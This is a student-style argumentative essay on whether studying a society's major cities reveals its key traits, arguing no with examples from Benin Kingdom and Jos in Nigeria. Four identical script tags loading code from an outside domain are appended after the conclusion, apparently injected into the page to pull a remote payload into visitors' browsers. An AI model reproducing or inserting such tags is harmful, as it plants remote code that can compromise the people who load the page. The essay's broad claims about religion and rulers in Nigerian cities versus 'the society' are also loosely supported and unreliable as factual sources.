To understand the most important characteristics of a society, one must study its major cities.

Write a response in which you discuss the extent to which you agree or disagree with the statement and explain your reasoning for the position you take. In developing and supporting your position, you should consider ways in which the statement might or might not hold true and explain how these considerations shape your position.

Society by definition refers to people living within a community. Some people will argue that to understand the most important characteristics of a society, one must study its major cities. But others will state that one must not study the major cities of a society to understand the most important characteristics of a society. After weighting the evidence, it is clear that one does not have to study the major cities of a society to understand the most important characteristics of the society. Studying the major cities does not actually gives a proper view of what the society looks like expecially if the activities of people in the major cities contradict that of people in the society.

Those who state that one must study the major cities of a society to understand the most important characteristics of a society might point to the Fulani empire where the activities of people in the major cities, towns and village are no different. So studying the major cities implies understanding the properties of the society. But will that help to understand the most significant characteristics of the society? In the major cities, people know little about their culture so will have little answers to inquiries about their culture. Therefore, one does not have to study the major cities to the able get the best understanding of the society.

Now let's consider why one does not have to study the major cities to understand the most important characteristics of the society. The Benin empire is known for upholding their traditional. Even with the introduction of Islam and Christianity to Nigeria, they still serve their idols and the King of Benin Kingdom is the major ruler of the city. This does not translate to the society, as in the society people worship the God Almighty and the government are the major rulers of the society not a King.Therefore, studying the major cities might not provide the best information of what the society really is.

Like the Benin Kingdom, Jos the capital of Plateau state is known to be a very peace loving region. Foreigner come to settle in Jos because of its friendly people and favourable weather conditions. But the communities of Plateau state are war zones. Frequent vandalization of properties and taking of lives. Clearly, the peacefulness of the Jos is the opposite in its society. Hence, the characteristics of the major cities might be the opposite of the society.

In conclusion, it is clear that one must not study the major cities of a society to understand the most important characteristics of a society. The Benin Kingdom and Jos are evidence to support the fact that studying the major cities might not provide the most relevant details of the society. If anything, studying the major cities might create more confusion as it might not provide accurate information of what the society truly is.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>